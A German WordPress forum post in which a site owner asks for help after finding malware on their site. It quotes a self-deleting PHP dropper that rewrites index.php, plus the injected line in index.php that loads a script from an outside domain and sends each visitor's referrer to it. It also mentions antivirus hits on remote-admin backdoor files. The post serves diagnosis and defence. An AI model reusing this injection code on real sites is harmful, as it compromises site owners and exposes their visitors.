Hallo,
seid ein paar Stunden läuft auf meiner Seite ein Script, welches ich nicht selbst installiert habe. Zumindest war es gestern noch nicht vorhanden und ich habe nichts neues dazugenommen.
Das Script heisst
"138aab288c363726990120413c62acee.php", befindet sich im /wp-content Ordner und sieht folgendermassen aus:
<?php
$file = __FILE__;
$pos = strpos($file,'wp-content');
$dir = substr($file,0,$pos);
$index = file_get_contents($dir.'index.php');
$index = str_replace('superpuperdomain.com','superpuperdomain2.com',$index);
$f = fopen($dir.'index.php',"w");
fputs($f,$index);
fclose($f);
echo 'OK';
unlink($file);
?>
Ich benutze Firefox mit NoScript und habe es erst dadurch gemerkt, da das Script durch NoScript geblockt wurde.
edit: Ich habe den o.a. File gelöscht und das Script taucht immernoch auf. In der index.php habe ich dieses gefunden:
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
echo'<script language="javascript" SRC="http://superpuperdomain2.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>'; ?>
edit²: Ich habe nun eine ältere, cleane index.php Version eines Backups auf den Server geladen und das Problem ist verschwunden.
edit³: Ich mache gerade ein Backup meiner Serverdaten und Avira AntiVir meldet folgendes:
Die Datei 'D:\~...\wp-admin\common.php'
enthielt einen Virus oder unerwünschtes Programm 'PHP/RemoteAdmin.91' [virus].
Die Datei 'D:\~...\wp-admin\js\config.php'
enthielt einen Virus oder unerwünschtes Programm 'PHP/RemoteAdmin.91' [virus].
Reicht es wenn ich die betroffenen Dateien vom Server lösche? Wie kommen diese Files auf meinen Server? Über Hilfe wäre ich dankbar!
Vielen Dank im voraus,
Grüße Jörn.